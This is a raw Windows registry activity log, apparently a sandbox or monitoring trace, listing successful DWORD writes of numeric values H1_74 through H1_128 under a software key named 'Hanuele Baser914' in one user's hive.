5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_74 Dword -253003631 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_74 Dword -236446000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_75 Dword -1368760832 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_75 Dword 1733729430 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_75 Dword 1716905561 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_75 Dword 1733722136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_76 Dword -65987785 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_76 Dword -591071126 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_76 Dword -574126303 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_76 Dword -591077024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_77 Dword -507916 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_77 Dword 1379094532 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_77 Dword 1395664105 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_77 Dword 1379091112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_78 Dword -1793237856 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_78 Dword -945701576 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_78 Dword -962411087 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_78 Dword -945708048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_79 Dword -1509484191 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_79 Dword 1024463676 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_79 Dword 1007903609 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_79 Dword 1024460088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_80 Dword 1458346195 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_80 Dword -1300332886 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_80 Dword -1283653439 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_80 Dword -1300339072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_81 Dword 1422853011 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_81 Dword 669832674 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_81 Dword 653238665 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_81 Dword 669829064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_82 Dword -312934327 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_82 Dword -1654968294 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_82 Dword -1671934127 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_82 Dword -1654970096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_83 Dword -93701865 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_83 Dword 315202444 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_83 Dword 332065817 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_83 Dword 315198040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_84 Dword 1523170029 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_84 Dword -2009596387 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_84 Dword -1993044511 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_84 Dword -2009601120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_85 Dword -880383567 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_85 Dword -39430768 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_85 Dword -56284503 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_85 Dword -39432984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_86 Dword 1304520312 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_86 Dword 1930736865 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_86 Dword 1914161265 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_86 Dword 1930735152 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_87 Dword 2065942058 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_87 Dword -394062792 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_87 Dword -377460423 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_87 Dword -394064008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_88 Dword 601382276 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_88 Dword 1576100254 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_88 Dword 1559369345 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_88 Dword 1576104128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_89 Dword -1709594043 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_89 Dword -748699493 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_89 Dword -765676471 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_89 Dword -748695032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_90 Dword 264012307 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_90 Dword 1221470122 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_90 Dword 1238193425 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_90 Dword 1221473104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_91 Dword -109071015 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_91 Dword -1103327348 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_91 Dword -1086328103 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_91 Dword -1103326056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_92 Dword -833089351 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_92 Dword 866838232 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_92 Dword 849974177 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_92 Dword 866842080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_93 Dword -1406793483 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_93 Dword -1457962641 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_93 Dword -1474678423 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_93 Dword -1457957080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_94 Dword 1469320481 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_94 Dword 512207528 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_94 Dword 528801329 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_94 Dword 512211056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_95 Dword 1155185605 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_95 Dword -1812593842 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_95 Dword -1829404679 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_95 Dword -1812588104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_96 Dword 683563609 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_96 Dword 157577145 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_96 Dword 140975425 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_96 Dword 157580032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_97 Dword 1480888822 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_97 Dword 2127741002 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_97 Dword 2144451081 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_97 Dword 2127748168 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_98 Dword 306015729 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_98 Dword -197056502 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_98 Dword -180200495 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_98 Dword -197050992 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_99 Dword -1393822578 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_99 Dword 1773113184 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_99 Dword 1756166297 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_99 Dword 1773117144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_100 Dword 1877689707 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_100 Dword -551674706 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_100 Dword -568498591 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_100 Dword -551682016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_101 Dword -1095822275 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_101 Dword 1418492612 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_101 Dword 1435436841 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_101 Dword 1418486120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_102 Dword -1651008770 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_102 Dword -906305800 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_102 Dword -923163407 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_102 Dword -906313040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_103 Dword 905092521 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_103 Dword 1063858776 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_103 Dword 1047152057 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_103 Dword 1063855096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_104 Dword 2111250430 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_104 Dword -1260938184 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_104 Dword -1244339455 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_104 Dword -1260944064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_105 Dword 960467894 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_105 Dword 709230200 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_105 Dword 726040777 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_105 Dword 709224072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_106 Dword -1985456759 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_106 Dword -1615572856 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_106 Dword -1632165487 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_106 Dword -1615575088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_107 Dword -783709887 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_107 Dword 354585266 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_107 Dword 337760089 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_107 Dword 354593048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_108 Dword -1540392900 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_108 Dword -1970196566 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_108 Dword -1953338335 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_108 Dword -1970206112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_109 Dword -1580889345 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_109 Dword -34582 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_109 Dword -17035799 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_109 Dword -37976 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_110 Dword -1187525582 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_110 Dword 1970132440 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_110 Dword 1953409713 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_110 Dword 1970130160 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_111 Dword -1172638613 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_111 Dword -354665165 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_111 Dword -337688455 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_111 Dword -354669000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_112 Dword 571594702 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_112 Dword 1615499935 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_112 Dword 1632233921 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_112 Dword 1615499136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_113 Dword -1029334114 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_113 Dword -709300465 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_113 Dword -725903735 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_113 Dword -709300024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_114 Dword -789066468 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_114 Dword 1260865507 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_114 Dword 1243886673 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_114 Dword 1260868112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_115 Dword 1157366630 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_115 Dword -1063934162 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_115 Dword -1047079655 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_115 Dword -1063931048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_116 Dword 2021685722 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_116 Dword 906233464 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_116 Dword 923235041 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_116 Dword 906237088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_117 Dword 533842099 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_117 Dword -1418564445 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_117 Dword -1435429975 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_117 Dword -1418562072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_118 Dword -46285983 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_118 Dword 551601384 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_118 Dword 568570225 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_118 Dword 551606064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_119 Dword 1711499557 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_119 Dword -1773199042 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_119 Dword -1756602823 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_119 Dword -1773193096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_120 Dword -1243852398 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_120 Dword 196971677 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_120 Dword 180289409 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_120 Dword 196975040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_121 Dword 1792917195 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_121 Dword -2127825773 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_121 Dword -2144821943 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_121 Dword -2127824120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_122 Dword -1342914294 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_122 Dword -157661186 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_122 Dword -140953071 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_122 Dword -157655984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_123 Dword 341871180 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_123 Dword 1812507970 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_123 Dword 1829493721 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_123 Dword 1812512152 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_124 Dword 1728343865 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_124 Dword -512292101 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_124 Dword -529237855 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_124 Dword -512287008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_125 Dword 2001952369 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_125 Dword 1457888578 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_125 Dword 1474750057 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_125 Dword 1457881128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_126 Dword -382810071 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_126 Dword -866911646 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_126 Dword -850360527 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_126 Dword -866918032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_127 Dword 759312506 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_127 Dword 1103255301 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_127 Dword 1086399737 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_127 Dword 1103250104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_128 Dword -328888487 success or wait 1
